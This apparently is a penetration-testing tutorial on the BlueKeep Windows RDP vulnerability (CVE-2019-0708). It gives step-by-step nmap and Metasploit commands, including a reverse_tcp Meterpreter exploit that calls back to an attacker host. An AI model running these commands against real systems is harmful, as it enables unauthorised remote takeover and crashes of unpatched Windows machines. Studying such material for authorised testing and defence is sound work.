🧨Exploiting Windows CVE-2019-0708 RDP Vulnerability (BlueKeep)

CVE-2019-0708 - BlueKeep

• BlueKeep (CVE-2019-0708) is the name given to an RDP vulnerability in Windows that could potentially allow attackers to remotely execute arbitrary code and gain access to a Windows system and consequently the network that the target system is a part of.

• The BlueKeep vulnerability was made public by Microsoft in May 2019.

• The BlueKeep exploit takes advantage of a vulnerability in the Windows RDP protocol that allows attackers to gain access to a chunk of kernel memory consequently allowing them to remotely execute arbitrary code at the system level without authentication.

• Microsoft released a patch for this vulnerability on May 14th, 2019 and has urged companies to patch this vulnerability as soon as possible.

• At the time of discovery, about 1 million systems worldwide were found to be vulnerable.

• The BlueKeep vulnerability affects multiple versions of Windows:

  • XP

  • Vista

  • Windows 7

  • Windows Server 2008 & R2

• The BlueKeep vulnerability has various illegitimate PoC’s and exploit code that could be malicious in nature. It is therefore recommended to only utilize verified exploit code and modules for exploitation.

• The BlueKeep exploit has an MSF auxiliary module that can be used to check if a target system if vulnerable to the exploit and also has an exploit module that can be used to exploit the vulnerability on unpatched systems.

• The BlueKeep exploit module can be used to exploit vulnerable Windows systems and consequently provide us with a privileged meterpreter session on the target system.

Note: Targeting Kernel space memory and applications can cause system crashes.

Attack Flow for the Windows CVE-2019-0708 RDP Vulnerability (BlueKeep)

1. Confirm Presence of RDP

Objective: Verify if the target system has RDP (Remote Desktop Protocol) enabled.

Command:

nmap -p 3389 <Target_IP>

Description: Use Nmap to scan port 3389 on the target system to check if RDP service is available.

2. Assess BlueKeep Vulnerability

Objective: Determine if the target system is vulnerable to the BlueKeep vulnerability (CVE-2019-0708).

Command:

msfconsole
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS <Target_IP>
run

Description: Use the cve_2019_0708_bluekeep scanner module in Metasploit to check if the target system is vulnerable to BlueKeep.

3. Exploit BlueKeep Vulnerability

Objective: Exploit the BlueKeep vulnerability to gain remote code execution on the target system.

Command:

msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS <Target_IP>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <Your_IP>
set LPORT <Your_Port>
exploit

Description: Use the cve_2019_0708_bluekeep_rce exploit module in Metasploit to exploit the vulnerability and establish a Meterpreter session.

Note: Targeting Kernel space memory and applications can cause system crashes.

Hacker's Mantra:Everything about Mark Zuckerberg is pure hacker. Hackers don’t take realities of the world for granted; they seek to break and rebuild what they don’t like. They seek to outsmart the world. - Sarah Lacy